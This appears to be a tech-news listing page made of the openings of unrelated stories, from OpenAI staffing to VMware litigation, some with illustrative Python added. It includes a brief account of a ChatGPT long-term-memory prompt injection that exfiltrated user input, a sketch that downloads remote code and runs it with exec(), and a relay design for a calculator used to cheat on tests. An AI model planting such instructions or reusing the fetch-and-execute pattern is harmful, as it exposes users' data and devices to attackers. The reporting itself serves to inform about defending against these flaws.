Mira Murati, Chief Technology Officer of OpenAI, speaks during The Wall Street Journal’s WSJ Tech Live Conference in Laguna Beach, California on October 17, 2023. (credit: PATRICK T. FALLON via Getty Images)

On Wednesday, OpenAI Chief Technology Officer Mira Murati announced she is leaving the company in a surprise resignation shared on the social network X. Murati joined OpenAI in 2018 and served for six and a half years in various leadership roles, most recently as CTO.

“After much reflection, I have made the difficult decision to leave OpenAI,” she wrote in a letter to the company’s staff. “While I’ll express my gratitude to many individuals in the coming days, I want to start by thanking Sam and Greg for their trust in me to lead the technical organization and for their support throughout the years,” she continued, referring to OpenAI CEO Sam Altman and President Greg Brockman. “There’s never an ideal time to step away from a place one cherishes, yet this moment feels right.”

At OpenAI, Murati oversaw the company’s technical strategy and product development, including the launch and improvement of DALL-E, Codex, Sora, and the ChatGPT platform, while also leading its research and safety teams. In public appearances, Murati often spoke about ethical considerations in AI development.

Putting the “chat” in ChatGPT (credit: Getty Images)

In May, when OpenAI first demonstrated GPT-4o’s upcoming audio conversation capabilities, I wrote that it felt like we were “on the verge of something… like a sea change in how we think of and work with large language models.” Now that those “Advanced Voice” features are rolling out widely to ChatGPT subscribers, we decided to ask ChatGPT to explain, in its own voice, how this new method of interaction might impact our collective relationship with large language models.

That chat, which you can listen to and read a transcript of below, shouldn’t be treated as an interview with an official OpenAI spokesperson or anything. Still, it serves as a fun way to offer an initial test of ChatGPT’s live conversational chops.

Our first quick chat with GPT-4o’s new “Advanced Voice” features.

Even in this short introductory “chat,” we were impressed by the natural, dare-we-say human cadence and delivery of ChatGPT’s “savvy and relaxed” Sol voice (which reminds us a bit of ’90s Janeane Garofalo). Between ChatGPT’s ability to give quick responses—offered in milliseconds rather than seconds—and its convincing intonation, it’s incredibly easy to fool yourself into thinking you’re speaking to a conscious being rather than what is, as ChatGPT says here, “still just a computer program processing information, without real emotions or consciousness.”
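
Curious readers can get a rough feel for that latency gap themselves. The sketch below, which assumes the official OpenAI Python SDK and an example model name, times how long a streamed text response takes to produce its first token. It’s only a proxy: Advanced Voice runs on a separate speech-to-speech pipeline that can’t be instrumented this way.

```python
# A rough, unofficial way to gauge the "milliseconds rather than
# seconds" point: time how long a *streamed* text completion takes to
# produce its first token. This is only a proxy for Advanced Voice,
# which uses a separate speech-to-speech pipeline.
import time

from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

start = time.monotonic()
stream = client.chat.completions.create(
    model="gpt-4o",  # example model name
    messages=[{"role": "user", "content": "Say hello."}],
    stream=True,
)
for chunk in stream:
    # The first chunk may carry only role metadata, so wait for content.
    if chunk.choices and chunk.choices[0].delta.content:
        print(f"First token after {time.monotonic() - start:.3f} s")
        break
```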

When security researcher Johann Rehberger recently reported a vulnerability in ChatGPT that allowed attackers to store false information and malicious instructions in a user’s long-term memory settings, OpenAI summarily closed the inquiry, labeling the flaw a safety issue rather than, technically speaking, a security concern.

So Rehberger did what all good researchers do: He created a proof-of-concept exploit that used the vulnerability to exfiltrate all user input in perpetuity. OpenAI engineers took notice and issued a partial fix earlier this month.

Strolling down memory lane

The vulnerability abused long-term conversation memory, a feature OpenAI began testing in February and made more broadly available in September. ChatGPT’s memory stores information from previous conversations and uses it as context in all future conversations. That way, the LLM can be aware of details such as a user’s age, gender, philosophical beliefs, and pretty much anything else, so those details don’t have to be re-entered during each conversation.
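
OpenAI hasn’t published how memory is implemented, but a minimal version is easy to picture: persist facts between sessions and inject them into the model’s context at the start of each new chat. Here’s a hedged sketch along those lines using the OpenAI Python SDK; the memory store, prompt format, and model name are all illustrative, not OpenAI’s actual design.

```python
# A minimal sketch of a "long-term memory" layer, assuming the simple
# design of injecting stored facts into the system prompt of every new
# chat. OpenAI hasn't published its implementation; everything here is
# illustrative.
from openai import OpenAI

client = OpenAI()

# In ChatGPT this store persists across conversations; a plain list
# stands in for it here.
memories = ["User's name is Alex.", "User prefers metric units."]

def chat(user_message: str) -> str:
    system_prompt = (
        "You are a helpful assistant.\n"
        "Known facts about the user:\n" + "\n".join(memories)
    )
    resp = client.chat.completions.create(
        model="gpt-4o-mini",  # example model name
        messages=[
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": user_message},
        ],
    )
    return resp.choices[0].message.content
```

Anything written into that store rides along with every future conversation, which is why a planted instruction, like the ones in Rehberger’s proof of concept, persists until the user finds and deletes it.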

Filmmaker James Cameron. (credit: James Cameron / Stability AI)

On Tuesday, Stability AI announced that renowned filmmaker James Cameron—of Terminator and Skynet fame—has joined its board of directors. Stability is best known for its pioneering but highly controversial Stable Diffusion series of AI image-synthesis models, first launched in 2022, which can generate images based on text descriptions.

“I’ve spent my career seeking out emerging technologies that push the very boundaries of what’s possible, all in the service of telling incredible stories,” said Cameron in a statement. “I was at the forefront of CGI over three decades ago, and I’ve stayed on the cutting edge since. Now, the intersection of generative AI and CGI image creation is the next wave.”

Cameron is perhaps best known as the director behind blockbusters like Avatar, Titanic, and Aliens, but in AI circles, he may be most relevant for co-creating the character Skynet, a fictional AI system that triggers nuclear Armageddon and dominates humanity in the Terminator media franchise. Similar fears of AI taking over the world have since leapt from fiction into real-world policy debates, recently sparking attempts to regulate existential risk from AI systems through measures like SB-1047 in California.

Broadcom is accusing AT&T of trying to “rewind the clock and force” Broadcom “to sell support services for perpetual software licenses … that VMware has discontinued from its product line and to which AT&T has no contractual right to purchase.” The statement comes from legal documents Broadcom filed [PDF] in response to AT&T’s lawsuit over Broadcom’s refusal to renew support for AT&T’s perpetual VMware licenses.

On August 29, AT&T filed a lawsuit [PDF] against Broadcom, alleging that Broadcom is breaking a contract by refusing to provide a one-year renewal of support for perpetually licensed VMware software. Broadcom famously ended perpetual VMware license sales shortly after closing its acquisition of the company, moving instead to a subscription model built around a couple of product bundles rather than many individual SKUs.

AT&T claims its VMware contract (signed before Broadcom’s acquisition closed in November) entitles it to three one-year renewals of perpetual license support, and it is currently trying to exercise the second one. AT&T says it uses VMware products to run 75,000 virtual machines (VMs) across about 8,600 servers, supporting customer service operations and operations management. AT&T is asking the Supreme Court of the State of New York to stop Broadcom from ending VMware support services for AT&T and to grant “further relief” as deemed necessary.

On Monday, OpenAI CEO Sam Altman outlined his vision for an AI-driven future of tech progress and global prosperity in a new personal blog post titled “The Intelligence Age.” The essay paints a picture of human advancement accelerated by AI, with Altman suggesting that superintelligent AI could emerge within the next decade.

“It is possible that we will have superintelligence in a few thousand days (!); it may take longer, but I’m confident we’ll get there,” he wrote.

OpenAI’s current goal is to create AGI (artificial general intelligence), a term for hypothetical technology that could match human intelligence at many tasks without needing task-specific training. Superintelligence goes a step beyond AGI: a hypothetical level of machine intelligence that could dramatically outperform humans at any intellectual task, perhaps to an unfathomable degree.

Five years ago, researchers made a grim discovery—a legitimate Android app in the Google Play market that had been surreptitiously made malicious by a library its developers used to earn advertising revenue. The library infected the app with code that caused the roughly 100 million devices running it to connect to attacker-controlled servers and download secret payloads.

Now, history is repeating itself. Researchers from the same Moscow-based security firm reported Monday that they found two new apps, downloaded from Play 11 million times, that were infected with the same malware family. The researchers, from Kaspersky, believe a malicious software development kit for integrating advertising capabilities is once again responsible.

Clever tradecraft

Software development kits, better known as SDKs, are collections of code libraries and tools that can greatly speed up the app-creation process by streamlining repetitive tasks. An unverified SDK module incorporated into the apps ostensibly supported the display of ads. Behind the scenes, it provided a host of advanced methods for stealthy communication with malicious servers, where the apps would upload user data and download malicious code that could be executed and updated at any time.
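
To see why a tainted ad SDK is so dangerous, it helps to look at the dynamic-loading pattern itself. The sketch below is a deliberately simplified Python stand-in for what would really be Java or Kotlin inside an Android app; every name and URL in it is hypothetical.

```python
# Simplified stand-in (in Python, rather than the Java/Kotlin an
# Android SDK would actually use) for the dynamic-loading pattern
# Kaspersky describes. Every name and URL here is hypothetical.
import urllib.request

# In the benign case this serves updated ad logic; in the malicious
# case, whoever controls the server ships arbitrary code.
MODULE_URL = "https://ads-sdk.example.com/module.py"

def load_remote_module() -> None:
    """Fetch code from a remote server and execute it in-process."""
    payload = urllib.request.urlopen(MODULE_URL).read().decode()
    # Nothing constrains what the downloaded code does: it runs with
    # the host app's full permissions and can be swapped at any time.
    exec(payload)
```

The host app’s developers never see the payload at build time, which is how an otherwise legitimate app ends up distributing malware.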

A pleasant female voice greets me over the phone. “Hi, I’m an assistant named Jasmine for Bodega,” the voice says. “How can I help?”

“Do you have patio seating?” I ask. Jasmine sounds a little sad as she tells me that, unfortunately, the San Francisco–based Vietnamese restaurant doesn’t have outdoor seating. But her sadness isn’t the result of her having a bad day. Rather, her tone is a feature, a setting.

Jasmine is a member of a new, growing clan: the AI voice restaurant host. If you’ve recently called up a restaurant in New York City, Miami, Atlanta, or San Francisco, chances are you’ve spoken to one of Jasmine’s polite, calculated competitors.

On Saturday, a YouTube creator called “ChromaLock” published a video detailing how he modified a Texas Instruments TI-84 graphing calculator to connect to the Internet and access OpenAI’s ChatGPT, potentially enabling students to cheat on tests. The video, titled “I Made The Ultimate Cheating Device,” demonstrates a custom hardware modification that lets users type problems on the calculator’s keypad, send them to ChatGPT, and receive live responses on the screen.

ChromaLock began by exploring the calculator’s link port, typically used for transferring educational programs between devices. He then designed a custom circuit board he calls the “TI-32,” which incorporates a tiny Wi-Fi-enabled microcontroller, the Seeed Studio ESP32-C3 (which costs about $5), along with other components to interface with the calculator’s systems.

It’s worth noting that the TI-32 hack isn’t a commercial project. Replicating ChromaLock’s work would involve purchasing a TI-84 calculator and a Seeed Studio ESP32-C3 microcontroller, sourcing various other electronic components, and fabricating a custom PCB based on ChromaLock’s design, which is available online.
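
To give a sense of the relay architecture without reproducing ChromaLock’s actual firmware, here’s a hedged MicroPython sketch of the ESP32-C3’s role: read a prompt, forward it to the ChatGPT API, and write the answer back. The pins, model name, and the plain UART standing in for TI’s two-wire link protocol are all assumptions.

```python
# Hedged MicroPython sketch of the relay role a device like the TI-32
# plays, written for an ESP32-C3. This is NOT ChromaLock's firmware:
# the real board speaks TI's link protocol, which a plain UART stands
# in for here. Assumes Wi-Fi has already been joined via network.WLAN.
import json

import urequests
from machine import UART

uart = UART(1, baudrate=9600, tx=4, rx=5)  # placeholder pins
API_KEY = "sk-..."  # stored on the device, not the calculator

while True:
    line = uart.readline()  # one newline-terminated prompt at a time
    if not line:
        continue
    resp = urequests.post(
        "https://api.openai.com/v1/chat/completions",
        headers={
            "Authorization": "Bearer " + API_KEY,
            "Content-Type": "application/json",
        },
        data=json.dumps({
            "model": "gpt-4o-mini",  # example model name
            "messages": [
                {"role": "user", "content": line.decode().strip()},
            ],
        }),
    )
    answer = resp.json()["choices"][0]["message"]["content"]
    resp.close()
    uart.write((answer + "\n").encode())  # calculator renders the reply
```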

Certificate authorities and browser makers are planning to end the use of WHOIS data for verifying domain ownership, following a report that demonstrated how threat actors could abuse the process to obtain fraudulently issued TLS certificates.

TLS certificates are the cryptographic credentials that underpin HTTPS connections, a critical component of online communication that verifies a server belongs to a trusted entity and encrypts all traffic passing between it and end users. These credentials are issued by any one of hundreds of CAs (certificate authorities) to domain owners. The rules for how certificates are issued, and for how the rightful owner of a domain is verified, are set by the CA/Browser Forum. One rule in the forum’s Baseline Requirements allows CAs to send an email to an address listed in the WHOIS record for the domain being applied for. When the receiver clicks an enclosed link, the certificate is automatically approved.

Non-trivial dependencies

Researchers from security firm watchTowr recently demonstrated how threat actors could abuse the rule to obtain fraudulently issued certificates for domains they didn’t own. The security failure resulted from a lack of uniform rules for determining the validity of sites claiming to provide official WHOIS records.
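
As a rough illustration of how brittle that process is, here’s a sketch of what a naive domain-control check might look like: shell out to the system whois client and scrape a contact address from whatever server answers. Nothing in this flow pins down which WHOIS source is authoritative, and that ambiguity is the opening watchTowr found. This is an illustrative sketch, not any CA’s actual validation code.

```python
# Illustrative sketch of a naive WHOIS-based domain-control check, not
# any CA's actual validation code. It shells out to the system whois
# client and scrapes the first email address from whatever server
# answers; nothing here verifies which WHOIS source is authoritative.
import re
import subprocess

def whois_contact_email(domain: str) -> str | None:
    out = subprocess.run(
        ["whois", domain], capture_output=True, text=True
    ).stdout
    match = re.search(r"[\w.+-]+@[\w-]+\.[\w.-]+", out)
    return match.group(0) if match else None

# A CA following the old rule would mail a confirmation link to this
# address; if a spoofed WHOIS service answers, the attacker gets the
# link and, with it, the certificate.
print(whois_contact_email("example.com"))
```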
